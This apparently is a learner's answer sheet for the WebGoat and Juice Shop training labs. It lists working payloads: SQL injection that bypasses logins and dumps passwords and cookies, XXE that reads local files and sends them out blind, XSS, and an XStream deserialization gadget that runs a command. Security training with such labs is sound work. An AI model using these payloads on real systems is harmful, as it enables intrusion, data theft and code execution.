### SQLi ### Basic Smith - to show it returns smith's records Smith' or '1'='1 - to show exploit; 1=1 can be any true clause **Bender Login bender@juice-sh.op' -- [2:19 PM] 101 101 or 1=1 Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data -- Smith' union select all 1, '2' ,user_name,password, 'MC', cookie, 2 from user_system_data -- ## XXE ## Simple - <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment> Modern Rest Framework - change content type to: Content-Type: application/xml && <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user> <username>&root;</username><password>test</password></user> Blind SendFile ... /** * Solution: * * Create DTD: * * <pre> * <?xml version="1.0" encoding="UTF-8"?> * <!ENTITY % file SYSTEM "file:///c:/windows-version.txt"> * <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=%file;'>"> * %all; * </pre> * * This will be reduced to: * * <pre> * <!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]'> * </pre> * * Wire it all up in the xml send to the server: * * <pre> * <?xml version="1.0"?> * <!DOCTYPE root [ * <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd"> * %remote; * ]> * <user> * <username>test&send;</username> * </user> * * </pre> * */ ###XSS ### <script>alert('my javascript here')</script>4128 3214 0002 1999 DOM-XSS ... // something like ... http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E // or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript> ### Vuln - Components ### Jquery page: - it is contrived; but paste that in each box OK<script>alert("XSS")<\/script> OK<script>alert("XSS")<\/script> for the deserialization: got to the link: http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ to read about why it works so you can talk to it. <sorted-set> <string>foo</string> <dynamic-proxy> <interface>java.lang.Comparable</interface> <handler class="java.beans.EventHandler"> <target class="java.lang.ProcessBuilder"> <command> <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string> </command> </target> <action>start</action> </handler> </dynamic-proxy> </sorted-set>